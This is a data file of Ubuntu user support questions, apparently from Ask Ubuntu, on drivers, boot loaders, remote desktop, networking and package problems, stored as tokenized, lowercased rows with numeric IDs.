327249	2 amd 7950 's do not work in crossfire mode	i have 2 7950 graphics cards . i have tried to get them working in crossfire mode in several different ways all ending the same . the computer boots to the login screen and then just freezes . in order to break my computer out of this i have to open my case and disconnect the crossfire cable and boot and then reconnect it to try another method . i tried the ubuntu additional drivers section and tried both version of the proprietary . i even downloaded the drivers directly from the amd website and it will not work . anyone have any insight on how to get this thing working ? i am only using 1 display and running ubuntu 13.04 . edit : small update it appears if i let it sit there long enough the system unfreezes , but if i move the mouse a bit it freezes again . i did n't really see what happen after this .
327253	broadcom sta wireless driver crash	i recently installed ubuntu 12.04lts on my dell inspiron 2200 everything is working fine except for the wireless driver i 've installed broadcom sta wireless driver over 5 times and each time at the end of the install it goes to a black screen with a bunch of info where i still am able to move the mouse but nothing else i have to reboot my computer to do anything else and in the network bar the wireless enabled has disappeared along with anything else having to do with the wireless network !
327255	how do i open shutter 's main window after closing it ?	shutter is running : how do i open its main window ?
327263	tunneled xvnc connection to ubuntu 13.04 from windows 7 client -- painfully slow !	i recently upgraded to ubuntu 13.04 . prior to the upgrade i was effectively using xrdp to access my unity 2d ( gnome-fallback-session ) desktop from my windows 7 client . with the upgrade my understanding is that the gnome-fallback-session is no longer available under 13.04 , and further the xrdp server could not handle the unity desktop over a remote session . as an alternative i am using a tunneled xvnc connection to establish a remote desktop connection between my windows 7 machine and ubuntu 13.04 workstation . briefly , ( i ) connect via ssh to the server ( ii ) startup xvnc server via sudo x11vnc -display :1 -auth guess -q and ( iii ) use realvnc vncviewer application to access the remote desktop . with this approach i can manage some work , but the connection is awfully slow with bad geometry . firstly , the refresh rate severely hinders delivery of the remote desktop to the client viewer , although i 've already disabled some of the effects & animations in unity . second , i have very limited control over the geometry of the desktop , thus even scaled down to fit the geometry of the client display the result is a very condensed and disproportional remote desktop view . i would appreciate any suggestions to either ( a ) improving the xvnc experience or ( b ) alternative ( but straightforward ) solutions for remote desktop access . thanks in advance kam
327265	need to boot kernel	ok , i have no idea what i 'm doing , and i 'm a total newbie with the ubuntu kernel and grub and whatnot . right now , i have ubuntu 13.04 installed on an external drive , and am trying to get it to boot on my laptop . whenever i do it on my desktop , it works fine , but the laptop just brings up a grub 2 prompt . i googled for a while but came up with nothing at all . and , when i try to just type 'boot ' , it responds `` error : you need to load the kernel first . '' any help is appreciated , bit if minimal techie speak is used , it would be even better !
327268	ralink rt5390 driver problem	i am a new linux user . i am trying to set up my ralink drivers . i am following the steps from another forum which are : download driver : http : //www.mediatek.com/_en/07_downloads/01-1_windowsdetail.php ? sn=5001 tar -xvf /home/ukbeast/username/downloads /2011_1007_rt5390_rt5392_linux_sta_v2.5.0.3_dpo_v2.bz2.bz2 cd 2011_1007_rt5390_rt5392_linux_sta_v2.5.0.3_dpo download patch : http : //gridlox.net/diff/rt5592sta_fix_64bit_3.8.patch patch -p1 < rt5592sta_fix_64bit_3.8.patch ( if asks for directory point it to pci_main_dev.c ) make sure /os/linux/config.mk reads has_native_wpa_supplicant_support=y make sudo make install modprobe rt5390sta i am getting stuck on step 5 . when i enter patch -p1 < rt5592sta_fix_64bit_3.8.patch into the terminal i am getting `` no such file or directory '' as a response . i do not know how to point it to pci_main > dev.c ? any help on how to point it there would be much appreciated .
327270	~/.xinput.d folder is ignored in ubuntu 13.04	it used to be that you could make a file ~/.xinput.d/en_us and put xinput commands in there , such as enabling drag lock . now , for some reason , in 13.04 this does not work . anyone know why this changed , and how to set these ? i suppose i could just put the xinput commands in a script file and have it execute upon login . i 'm just wondering why the old method stopped working . edit : current file /etc/x11/xinit/xinput.d/en_us : xinput set-prop 17 316 1 xinput set-prop 17 317 350 but i 've realized that for some reason , the touchpad id changes . right now it 's 15 . also , the actual properties such as `` drag lock '' can change . so this method does n't work .
327279	unable to access my external hard disk	while trying to open my external connected hard disk , i get : error mounting /dev/sdb1 at /media/mani/my passport1 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb1 '' `` /media/mani/my passport1 '' ' exited with non-zero exit status 13 : ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to calculate free mft records : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . please tell to resolve this issue . also i dont want the data on the disk to be lost during the process ... .. i 'm using ubuntu 13.04 64bit on dell xpsm1530
327280	ubuntu sso - hotmail as preferred address ?	to fetch my ubuntu sso-account with my existing ubuntuforums account , i have to change my preferred email address in sso . my registered email in ubuntuforums is an old hotmail-account , which is also registered in launchpad . when i try to set this email as preferred in sso , it does n't appear in the list , although i get a message , that it is already linked to the account . are hotmail-accounts not accepted in sso ? how to tell sso to list my launchpad-account ?
327282	copying multiple specific files from one folder to another	i have a large folder of pictures ( thousands ) , and i have a long list of files , by exact file name , that i need to copy to another folder . i want to know if there is a way i can select several specific files from this folder , by name , and copy them to another folder , using the terminal , without copying them individually ?
327283	gnome-terminal does not allow changing the title	i 've selected `` replace initial title '' setting in gnome-terminal 's preferences , but it just shows the default title `` terminal '' . after reading this answer , i added this to my .bashrc : prompt_command='echo -ne `` \033 ] 0 ; $ { user } @ $ { hostname } : $ { pwd/ $ home/~ } \007 '' ' and also commented out this line : # ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' after restarting terminal , it started to show user @ hostname : ~/currentdir in its title , changing it whenever i cd to another directory . but it still does not change when i launch cli programs like cmus and vim ( vim , for example , sets current filename as a title ) . i 've installed rxvt and everything works fine there . ubuntu 13.04 , gnome-terminal 3.6.1 . my .bashrc - almost the same as shipped with default ubuntu installation .
327287	speech-dispatcher disabled ; edit /etc/default/speech-dispatcher	when i install ubuntu 13.04 on vmware , the installation procedure goes well , but in the end of the installation , instead of displaying the graphical interface the message bellow shows up : acpid : exiting speech-dispatcher disabled ; edit /etc/default/speech-dispatcher *asking all remaining processes to terminate ... i tried the installation three times but the problem persists .
327289	how to cross compile latest mono-3.2.0 for arm ( hard float ) platform on ubuntu 13.04 ?	i have a beagle bone black board . i have prepared a sd card for board . on sd card is prepared with ubuntu-13.04-console-armhf-2013-07-22 . my booard is booting form sd card succesfully . now i want to install mono framework on that board . for that i want to cross compile latest version of mono from my host pc which is with os ubuntu-13.04 . i tried with scratchbox 1.x.x but when i give command , $ make -j 8 i got the error : `` hardfp-abi not yet supported . '' how can i cross compile mono for my beagle bone black ... .. ?
327292	wifi fail : /lib/firmware erased during boot	my computer is a dell latitude e6420 . after a fresh ubuntu 13.04 install , the wifi is not working . the wifi hardware is , result of sudo lspci | grep network : 02:00.0 network controller : intel corporation centrino advanced-n 6205 [ taylor peak ] ( rev 34 ) the wifi is working on live cd . if i boot in maintenance mode , the wifi is working ( after having reinstalled the firmware before shutdown ) . on /var/log/syslog i have iwlwifi 0000:02:00.0 : request for firmware file 'iwlwifi-6000g2a-5.ucode ' failed . the folder /lib/firmware should be populated with firmware , but it is empty . i repopulate it with a sudo aptitude reinstall linux-firmware , but after the next boot it is empty again . after booting i can make wifi work by running the following commands : sudo aptitude reinstall linux-firmware sudo modprobe -r iwldvm sudo modprobe -r iwlwifi sudo modprobe iwlwifi sudo service network-manager restart but the firmware files installed in /lib/firmware are erased again , and after the next boot i have to retype the previous commands to make it work again . thank you for for any help .
327293	ubuntu 12.04 cant boot with kernel 3.2.0-49 and 3.2.0-51	i am now using ubuntu12.04 with kernel 3.2.0-48 . where can i find some logs which will help me to find the reason ? sorry for my poor english .
327298	problem in giving entering input while running lex programs	i have installed vmware on my desktop . then i installed ubuntu 10.10 in vmware . i installed flex_2.5.35-9_i386.deb and m4_1.4.13-3_i386.deb packages for lex programs . i tried to run lex programs through terminal , there is no problem of compilation . but when i enter input it goes on accepting it . never gone forward for processing . it shows blank after entering input . is there some kind problem with version or packages .
327300	commands not working after editing .bashrc file	i need to install a programming software called cuda for my academic purpose . googling how to install it on my ubuntu 10.04 , i found these and i have done that . download the software cd ~/downloads sudo ./cudatoolkit_3.2.16_linux_32_ubuntu10.04.run gedit ~/.bashrc add the following entries : export cuda_install_path=/usr/local/cuda export path= $ cuda_install_path/bin save and exit . then run on bash . source ~/.bashrc now any command is not working saying : the command could not be located because '/bin ' is not included in the path environment variable . i ca n't understand as i am new to this . can you please help me ?
327301	gconftool2 settings are n't saved permanently	i tried to change some settings with the gconftool-2 : $ gconftool-2 -- set `` /apps/hamster-indicator/show_label '' -- type bool `` true '' checking if it was set returns true : $ gconftool-2 -- get `` /apps/hamster-indicator/show_label '' true now if i logout and login again ( to make the changes appear ) the settings are discarded and it is set back to false . i also tried it with sudo . do you know what could be wrong ?
327304	ubuntu 13.04 installed with windows 7 but not showing option to select os to boot with	hi i am running windows 7 home basic 64-bit , with amda8 and radeon graphic card pre installed . my notebook is hp-pavilion g6 . i have created the partitions to my 500gb-hdd before installing the ubuntu 13.04 , then i use the ubuntu 13.04 installer disk to install ubuntu . i use the same process as described in the guide which is boot with the installer disk select language , local time etc . then i select the option to install ubuntu alongside with windows 7 and follow the process . i got the message for installation complete and restart to begin boot with ubuntu . i do remove the disk from the tray and hit enter to restart the system . but when my system started it continued to boot with windows 7 without showing me the option to select the os . in my windows disk manager i am able to see two unknown partitions which i think is for swap partition and ext 4 partition .
327311	how to auto boot to ubuntu instead of showing text mode grub menu on power failure	text mode boot screen shows when the pc is started . ( it shows when for some reason , restart was not done safely , but in remote location i must need to boot the pc on power on ) how can i on power ignore this screen and take the default to boot urgent to ubuntu ?
327317	ubuntu not showing up in boot menu	i 've recently installed ubuntu on a sony laptop that already has win 8 on it . after googling all the possible ways to fix the problem , the laptop is still directly booting into win 8 . i 've already tried the boot-repair and the easybcd ways , and i 'm still facing this problem . can anyone tell me what i should do ? and this is what i got on the boot-repair : http : //paste.ubuntu.com/5935634/
327319	only some selected programs being able to access the internet , how to fix it ?	i 'm running ubuntu 13.04 currently and am seeing that only skype is able to access the internet . no other program is able to access the internet . everything was fine until yesterday . what could i be doing wrong , how can i fix this ?
327320	`` sleep '' button on keyboard puts computer into hibernate	i recently installed ubuntu 13.04 . i changed my shortcut for `` lock screen '' to the sleep button on my keyboard . but instead of just locking the screen it puts my computer into hibernation/suspend mode , which is kind of annoying . i ca n't find where the hibernation mode is bound to the sleep button . i already tried gsettings set org.gnome.settings-daemon.plugins.power button-sleep 'nothing ' ( as mentioned here ) but it does n't affect the sleep button and it still goes into hibernation/suspend . can you help me ?
327323	grub rescue limbo ... with a twist ?	gang . i am in a bit of a pickle . i can only boot into grub rescue , even if i attempt to boot from a usb stick . and : all the commands i have tried in grub rescue ( i.e . `` help '' `` halt '' `` reboot '' `` insmod '' `` sudo '' ) only yield the repsonse `` unknown command 'xxxx ' '' however , inputting `` ls '' does yield `` ( hd0 ) ( hd0 , msdos1 ) '' etc . i was dual-booting xubuntu and windows 7 ; this happened after i formatted the windows 7 partition using parted magic to ntfs . so , to recap : i ca n't ( as far as i can tell ) boot from usb ; any attempt to boot lands me in grub rescue ( or bios ) . no commands i have tried work in grub rescue . help ? thanks . : )
327329	how can i provide a security for users access the files in samba ?	i 'm creating a samba file server and each user with 5gb space , how can i provide a security for users access the files ? like authentication and credentials ?
327330	i want to take backup from ubuntu to other drive from terminal	my ubuntu has crashed and now i can only boot up from recovery mode where i can access only terminal . is it possible for me to secure my data from ubuntu in recovery mode ? what would be ideal is to be able to take a backup from ubuntu to some other devices like usb drive or any hard drive . please its urgent as all my work is stopped now and i just want backup to another device . your answer will highly appreciated thanks in advance .
327331	apt-get dist-upgrade wants to destroy my ubuntu 12.04 lts	this morning i have issued a command i use fairly often : apt-get dist-upgrade usually it finds little to do , some times it will replace the kernel and headers . with my great surprise today it responded this way : root @ xxxxx : ~ # apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages will be removed : apparmor console-setup grub kbd linux-image-3.2.0-23-generic linux-image-3.2.0-31-generic linux-image-3.2.0-49-generic linux-image-3.2.0-51-generic linux-image-server linux-server ntfs-3g plymouth-theme-ubuntu-text ubuntu-minimal the following new packages will be installed : libudev1 the following packages have been kept back : udev 0 upgraded , 1 newly installed , 13 to remove and 1 not upgraded . need to get 48.1 kb of archives . after this operation , 605 mb disk space will be freed . i was fairly hit by the amount freed and also by the distinct lack of a displayed replacement list of new packages . also , it says it 's removing grub ? since i had a very fresh backup i tried going ahead and guess what , it indeed destroyed my server and it could not boot any more . what 's the deal with this ? also , why does udev say that it wants sysv-rc version 2.88dsf-24 when all i have installed is 2.88dsf-13.10ubuntu11.1 ? it looks like some repository is doing something nuts . all i have installed of `` odd '' are repos for php fpm 5.4+ , mysql , nginx and varnish . they were added more than 1 month ago as well and never gave an issue with dist-upgrade .
327332	regional settings	is it possible to pre-select the regional settings , language , time zone etc on oem based custom install image ? so when user boots machine first time they get regional settings an simply move to user accounts options .
327335	replcaing a video with black frame ?	i want to convert video of a film to black frame . on the other hand , decreasing the video quality as much as possible , but no change in audio quality ! for example : film.avi ( 950mb ) -- - > film.mp4 ( 20mb ) film.mp4 = > video : lowest quality film.mp4 = > audio : the same as original file ( film.avi ) is this possible ?
327337	unable to install asterisk on ubuntu 12.10	i am working on a openbts project . i tried to install asterisk on 12.10 by watching a video . but it is showing that it is not able to unlock a 'lock ' file . in var/lib/dpkg/lock so i wanted some help on how to go about the installation of asterisk on ubuntu 12.10 ?
327338	script for initiating ssh connection for port forwarding , and then execute vnc viewer on client 's computer	i would like to write a script that gets as an argument a local computer ip ( on the network of the ssh server ) , and forwards port 5900 on the client 's computer to that ip:5900 on the server network . right after the connection is established i would like to execute vnc viewer and connect to that remote host , using the port forwarded . the script i came up with is as followed : # /bin/bash ssh -l 5900 : $ { 1 } :5900 user @ server-ip vncviewer 127.0.0.1:5900 and it should be used like that : say we have on the server 's network a computer with ip 10.0.0.10 , so executing the command : vnc-ssh-script 10.0.0.10 on my home ( client ) computer is supposed to open up the vnc viewer and allow me to control the local network computer 10.0.0.10 ( which runs vnc server ofcourse ) . only problem is that after the first line of the script is executed ( ssh -l 5900 : $ { 1 } :5900 user @ server-ip ) , the connection is established and the next command ( vncviewer 127.0.0.1:5900 ) wo n't be executed until the ssh session is closed ... my question is how can i establish the task i want ? i already tried appending ' & ' after the ssh command , but then when i execute the script i get the message : `` psedo-terminal will not be allocated because stdin is not a terminal . '' and it seems like that ssh is automatically closed ( and even if it did work , i would have an indication that it succeeded before executing the vncviewer command ) .
327348	installing libreoffice on xubuntu downloaded on another pc	sorry for my english due to malfunctioning of my router , i downloaded libreoffice for linux ( libreoffice_4.1.0_linux_x86-64_deb.tar.gz ) on a macintosh ibook g4 , then copied the file ... ... -.tar.gz. , by a memory stick , on a pc where i had just installed successfully xubuntu-13.14 ( same way : downloaded on mac and trasferred on pc for installing , was ok ) . double.click on the file for installing and i had this message ( in italian ) : '' sequenza byte invalid nell'input di conversione '' i presume came from english `` invalid byte sequence in conversion input '' . but what does it means ? i supposed corrupted data . i downloaded ( in the same way , because in that moment i can not change my router ) the file again . the result was the same . thinking due to a wrong version i downloaded other version : libreoffice_4.1.0_linux_x86_deb.tar.gz and libreoffice_4.1.0_linux_x86-64_rpm.tar.gz always the same help me please biagio
327357	fail to upgrade the ubuntu 12.04 kernel to 3.5	i followed the command in this question to upgrade my ubuntu kernel to 3.5 i entered the command and reboot after installation : sudo apt-get install linux-image-generic-lts-quantal and after rebooting , i found the kernel is still 3.2.0 . after that , i tried apt-cache search linux-image-3.5.0 and sudo apt-get install linux-image-3.5.0-37-generic . the messages showed that no new installation needed . for your information , this is my laptop spesification : asus a53s with intelâž coreâ˘ i7 cpu 2670qm @ 2.2ghz 8gb memory nvidia geforce gt630m i am not sure if i can upgrade from installing the debs , and suggestions ? edit : i tried sudo update-grub , and i still can not see ubuntu 3.5.0-37 in my grub menu.i also checked grub advanced options for ubuntu , 3.2.0-49 & 3.5.0-36 & 3.5.0-37 do not exist . rosfuerte @ rosfuerte-k53sm : ~ $ sudo update-grub [ sudo ] password for rosfuerte : generating grub.cfg ... found linux image : /boot/vmlinuz-3.5.0-37-generic found initrd image : /boot/initrd.img-3.5.0-37-generic found linux image : /boot/vmlinuz-3.5.0-36-generic found initrd image : /boot/initrd.img-3.5.0-36-generic found linux image : /boot/vmlinuz-3.2.0-49-generic found initrd image : /boot/initrd.img-3.2.0-49-generic found linux image : /boot/vmlinuz-3.2.0-41-generic found initrd image : /boot/initrd.img-3.2.0-41-generic found linux image : /boot/vmlinuz-3.2.0-35-generic found initrd image : /boot/initrd.img-3.2.0-35-generic found linux image : /boot/vmlinuz-3.2.0-32-generic found initrd image : /boot/initrd.img-3.2.0-32-generic found linux image : /boot/vmlinuz-3.2.0-31-generic found initrd image : /boot/initrd.img-3.2.0-31-generic found linux image : /boot/vmlinuz-3.2.0-30-generic found initrd image : /boot/initrd.img-3.2.0-30-generic found linux image : /boot/vmlinuz-3.2.0-29-generic found initrd image : /boot/initrd.img-3.2.0-29-generic found linux image : /boot/vmlinuz-3.2.0-23-generic found initrd image : /boot/initrd.img-3.2.0-23-generic found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sda1 found ubuntu 13.04 ( 13.04 ) on /dev/sda5 done rosfuerte @ rosfuerte-k53sm : ~ $
327358	compatibility problems in ubuntu	just wondering if there any ways around the compatibility problems on ubuntu , such as using an ipod , printer etc ? my last questions which was similar in vein someone answered by pointing me to a website that was really helpful ; are there any other online means of say , updating an ipod to avoid compatibility problems ? any help would be greatly appreciated . thank you .
327362	unable to install anything in ubuntu 13.04 .	these are the errors i get , when i run the sudo apt-get update command can not initiate the connection to archive.ubuntu.com:80 ( 2001:67c:1360:8c01 : :23 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1360:8c01 : :23 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/dists/raring-updates/main/i18n/translation-en can not initiate the connection to archive.ubuntu.com:80 ( 2001:67c:1360:8c01 : :23 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1360:8c01 : :23 80 ]
327365	open ubuntu directory in windows ?	my ubuntu has a problem with /etc/rc.local , because of it , my ubuntu wo n't boot to desktop . so i want to remove some entries in rc.local on windows , how can i do it ? thanks . ( i think i ca n't open a terminal in login screen . ) ( sorry bad english )
327368	wake on demand ( wod , wol )	i like to have my homeserver ( running ubuntu ) automatically powered on when i am connecting via ssh from the internet . i successfully configured the server to listen for wake on lan ( wol ) magic packets on the local network . i can poweroff the server and then send a wol magic package with wol to start the server . everything is working : ) but i like to go further : my router ( apple airport extreme ) is capable of wake on demand ( wod ) . but how can i register my server ( e.g . with avahi ) to the router , so that it knows to wake the server when connecting via ssh ? edit : some details : if the server is already running , i can connect from the internet via ssh ; port forwarding is correctly set up .
327370	get list of installed packages ?	i want to have a list of all packages that are installed on my server but the command dpkg -- get-selections > ~/package.list doesnt do anything ! when i execute it there is no file called `` package.list '' in the root folder . please help me its urgent .
327373	sound card does not show up in output devices	i have a tascam us-122 usb sound card connected to my ubuntu 13.04 laptop . the card is recognized by alsa ; alsamixer shows this device as having `` no controls '' , as it should . i have set it up as the default playback card ( in .asoundrc ) . i have added a udev-rule to load the proper usx2y module whenever the device is connected . all of this works . however , no media player will output sound to it ; only the onboard intel sound card is used . the card does not even show up in sound settings in the output tab ; it does show up on the input tab , as the default recording device . using audacity , i can select a specific device to output sound to . when i select the tascam card , i get this message ( translation mine ) : error opening sound device check the output settings of the device and the sample rate of the project . the intel card works as usual . i know that the card is set up correctly because recording through it works flawlessly . i would just like to be able to select it as an output device . what else can i try ? some output : $ > aplay -lv ** lijst van playback hardware-apparaten ** kaart 0 : intel [ hda intel ] , apparaat 0 : alc272 analog [ alc272 analog ] sub-apparaten : 1/1 sub-apparaat # 0 : subdevice # 0 kaart 1 : hdmi [ hda ati hdmi ] , apparaat 3 : hdmi 0 [ hdmi 0 ] sub-apparaten : 1/1 sub-apparaat # 0 : subdevice # 0 kaart 2 : usx2y [ tascam us-x2y ] , apparaat 0 : us-x2y audio [ us-x2y audio # 0 ] sub-apparaten : 1/1 sub-apparaat # 0 : subdevice # 0 cat ~/.asoundrc defaults.pcm . ! card usx2y defaults.ctl . ! card usx2y defaults.pcm . ! device 0 defaults.ctl . ! device 0 aplay -d hw:2,0 hugewav.wav speelt wave 'hugewav.wav ' : signed 16 bit little endian , frequentie 44100 hz , stereo aplay : set_params:1145 : kan hw parameters niet installeren : access : rw_interleaved format : s16_le subformat : std sample_bits : 16 frame_bits : 32 channels : 2 rate : 44100 period_time : ( 92879 92880 ) period_size : 4096 period_bytes : 16384 periods : 4 buffer_time : ( 371519 371520 ) buffer_size : 16384 buffer_bytes : 65536 tick_time : 0 the error message above translates to `` can not install hw parameters : '' .playing the same file on hw:0,0 , the built-in intel card , works fine . [ edit ] digging deeper : $ aplay -lv default playback/recording through the pulseaudio sound server sysdefault : card=intel hda intel , alc272 analog default audio device ... ( etc . many more entries , that refer to the intel card . skipping these . ) hw : card=intel , dev=0 hda intel , alc272 analog direct hardware device without any conversions plughw : card=intel , dev=0 hda intel , alc272 analog hardware device with all software conversions hdmi : card=hdmi , dev=0 hda ati hdmi , hdmi 0 hdmi audio output dmix : card=hdmi , dev=3 hda ati hdmi , hdmi 0 direct sample mixing device dsnoop : card=hdmi , dev=3 hda ati hdmi , hdmi 0 direct sample snooping device hw : card=hdmi , dev=3 hda ati hdmi , hdmi 0 direct hardware device without any conversions plughw : card=hdmi , dev=3 hda ati hdmi , hdmi 0 hardware device with all software conversions sysdefault : card=usx2y tascam us-x2y , us-x2y audio # 0 default audio device dmix : card=usx2y , dev=0 tascam us-x2y , us-x2y audio # 0 direct sample mixing device dsnoop : card=usx2y , dev=0 tascam us-x2y , us-x2y audio # 0 direct sample snooping device hw : card=usx2y , dev=0 tascam us-x2y , us-x2y audio # 0 direct hardware device without any conversions plughw : card=usx2y , dev=0 tascam us-x2y , us-x2y audio # 0 hardware device with all software conversions so both hw:2,0 and plughw:2,0 refer to the tascam card , and they give the same results . adding -v or -v -v does not yield any more information .
327380	how to connect laptop to internet via android phone	i have a laptop with linux os ( debian or ubuntu ) and a samsung galaxy s iii mini phone that is connected to internet with mobile data . how can i share mobile internet with laptop ?
327381	quit all instances of `gnome-terminal` via a command	this is half `` this 'd be useful for me '' and half `` hobby project '' - i was wondering if it 's possible to send a command via a gnome-terminal that will quit all instances of a program without using killall . essentially i 'd like to write a script , which i will put in my $ path , that will try and exit all open terminal windows as if the close button had been clicked on each , rather than killing . the reason being that i have a terrible habit of opening many terminal windows at once and it 's a hassle to go through each of them and quit all of them individually . simply typing exeunt ( because let 's face it , there 's no better name for a command to `` exit all '' ) and having them all quit would be far better for me . however , i do n't want to accidentally close any programs that are still running from within a terminal - i still want to see any `` there is still a process running in this terminal '' prompts , so the command killall gnome-terminal would be out of the question . the ideal i suppose would be a command-line / bash equivalent of rightclicking on the dash icon and pressing `` quit '' . possibly a slightly unorthodox request , but i 'd be interested to know if it 's somehow possible .
327386	crontab command in the 2nd line does n't run	i have these 2 lines in cron tab . the 1st command executes but the 2nd one does n't . it just does n't run . no traces in log . i have a new line ( enter ) at the end . i have restarted the cron service also . the path is correct , i can run it as shell command . not sure what 's going on 01 4,8,13 * * 1-5 sudo java -jar /opt/collective/classifier/classifier-1.0.jar both 01 21 * * 0-5 sudo java -jar /opt/collective/ikwkrefresh/ikwk-refresh-1.0.jar
327389	how can i remap `` special '' keys in xkb ?	i 've been trying to migrate my keyboard mapping from xmodmap to xkb , but i 'm having some trouble . i can see where to modify the `` normal '' keys , in /usr/share/x11/xkb/symbol/us for me , but this file seems devoid of `` special '' keys , including modifiers . the full remapping that i wish to achieve is : swap left ctrl and shift replace right ctrl with shift replace right shift with ' replace ' with / right blank key ( keycode 97 ) to menu left blank key ( keycode 92 ) to altgr altgr encodings : keycode 20 = minus underscore minus underscore endash emdash keycode 60 = period greater period greater ellipsis fn+f5 and fn+f6 control brightness keycode 148 = xf86monbrightnessdown nosymbol xf86monbrightnessdown keycode 179 = xf86monbrightnessup nosymbol xf86monbrightnessup how can i achieve this ?
327393	in skype microphone is not working	my dell microphone is not working with skype . i did following echo `` options snd-hda-intel model=6stack-dell '' | sudo tee -a /etc/modprobe.d/alsa-base.conf > /dev/null and reboot problem not solved . thank you .
327397	resolution too bulky	i noticed that my intel graphics on my laptop ( 12.10 ) seem to work differently than my nvidia graphics card on my desktop . the only thing that is abnormal is the resolution . compared to my old 2006 laptop , the screen is bulky , and i have to ctrl- to browse my favorite forums without scrolling a lot . i have it set at the largest resolution size ( 1024x768 ) . the nvidia driver seems to work fine . i can run high quality video and play games with it . i 'm unsure why the screen size remains to be so bulky though !
327403	android devloper tool is not opening	android develoment tool is not opening while click this dailog is opening my ubuntu version is 12.04
327412	is there a safe way to disable dhcp from command line ?	short version i know this question is very similar to others and i did really search the internet for answers , but it seems that no approach is working or the solutions seem to be `` to complicated to be best practice '' ( i 'll try to explain ) . i 'm looking for a safe way on how to disable dhcp from command line ( to use in scripts ) . background i 'm trying to create a `` live-cd '' with ubuntu server 12.04 and remastersys ( works well ) . the system is , by default , configured to get the ip with dhcp while booting . that 's ok - the important thing is that a script ( which runs after booting ) is able ( in some specific cases ) to set a static ip using ifconfig ( not /etc/network/interfaces ) : ifconfig eth0 192.168.0.1 actually this is also working , but the ip only persists until the dhcp lease time of the previously obtained lease is over . a new ip will be assigned to eth0 , which ( in short ) breaks the system . i thought `` no big deal , there will be surely something like : `` ifconfig eth0 dhcpdisabled but i ended up recognizing , it does n't work that easy . editing the /etc/network/interfaces is a bit tricky , because it is generated by remastersys ( actually the 23networking script of casper ) . i could rewrite it and restart networking , but what will happen to active dhclient.leases ? will be dhclient still be running in the background ( it should n't but some posts suggest it will be my tests showed it is restarted ârandomlyâ , if dhclient is killed ) , do i have to remove or empty dhclient.leases files , what about resolv.conf ? despair to sum it up - in my opinion it 's not really that `` straightforward '' and somewhat does n't `` feel stable '' . this question ( 156183 ) suggested to remove the dhclient package , but : will this solve the problem ? will this break other stuff ? is there really no command for this ? i hope i just overlooked it .
327413	mount.cifs vs. smbclient	i am using ubuntu 13.04 to connect to a windows 2008 server : if i use mount.cifs //server/share /mnt/mountpoint -o username=domain/credentials i successfully connect , but if i try to cp a file , i get access is denied . if i use smbclient //server/share -o domain/credentials i can successfully 'put ' the file on the server . why does mount.cifs fail but smbclient work ?
327416	upload freeware program to ubuntu software center	i am trying to upload a freeware program in ubuntu software center but it says that only paid programms can be uploaded . why ? how do i upload a freeware program .
327418	single line group of commands as individual ?	i made one small alias and got a question as , how to execute a single line group of commands as command by command with out breaking it ? echo `` alias get='sudo apt-get install ' '' > > .bashrc & bash here we have commands as echo & bash . even placing them all in a single line i want to execute them command by command . update : for example if there is a group command line as command1 ; command 2 ; command 3 ; command 4 ; commmand5 then i want to execute this group command not in a single step . 1st 3 commands at a time and then next 2 commands . but condition is i have to write all those commands in a single line .
327424	gtk+ compiling problem	when i try to compile gtimer 2.00 i get the following error : $ ./configure checking for gtk+ - version > = 2.4.0 ... no *** could not run gtk+ test program , checking why ... *** the test program failed to compile or link . see the file config.log for the *** exact error that occured . this usually means gtk+ is incorrectly installed . configure : error : no gtk found . set the path right or install it . what 's the problem ?
327425	how to do install gcc-4.5-arm-linux-gnueabi in ubuntu 13.04 ?	i tried sudo apt-get install gcc-4.5-arm-linux-gnueabi i got this error : e : package 'gcc-4.5-arm-linux-gnueabi ' has no installation candidate how i can download it ?
327426	how to use a old version of unity in newer versions of ubuntu ?	how can i use the older version of unity ( 4.03 ) found in ubuntu 11.10 on ubuntu 13.04 ? i understand that the new unity ( 7 ) has more improvements , but i just prefer the one in ubuntu 11.10 . is it possible to install it ? i have tried to add the old.ubuntu.releases archives and downgrading in synaptic to no avail .
327429	how do i delete a folder	i have created a folder in my file system called `` opt '' . it contains two other folders . how do i delete it with signing in as a root user ? thanks
327440	printer problems : epson-stylus-nx420	i am new to linux . i have heard one of the drawbacks to linux is the peripheral support . i automatically installed my epson stylus nx420 using the `` add printer '' feature . it was super easy and i was thrilled to prove that ubuntu defied the typical stereotype of printer support issues , or so i thought . i tried to print something and the printer went absolutely crazy . it spit out page after page , until i finally just unplugged it . i am curious to know if there is a driver out there that can correct this issue . i am using the 12.04 distro . thanks , jacob
327446	pink overlay on all raw files	i am having trouble with viewing raw files of the type cr2 taken with my canon eos 6d camera . the images show up in normal colors first , then after ~1 second gets a pink overlay added . this happens in all software , shotwell , gimp , darktable etc . the problem has happened after i did a clean reinstall of xubuntu . i did not have this problem before reinstalling . anyone got an idea ? example
327451	what alternatives to ms access exist for database management on the ubuntu platform ( libreoffice base is n't cutting it )	i have a web-based mysql database , which is very important . i have used the mysql connector to allow me to use an ms access database to query , and clean up my database , through an odbc connection . having moved my work computer to ubuntu linux ( finally ) i was trying to avoid using a virtualbox vm to host a windows installation to continue using ms access , since there are so many tools available for the linux platform . yesterday , i installed the mysql connector for libreoffice from the ubuntu software center , and planned to move forward with libreoffice , just like i did with ms access - but libreoffice base does n't have any ability to do update queries ( unless you are writing our sql query by hand ) - and it 's still kinda clunky ... imho . what other database management tools exist for a ubuntu desktop , so i can query , update , and report my web-based mysql database , ( and can completely avoid windows and ms access , going forward ) ? thank you in advance !
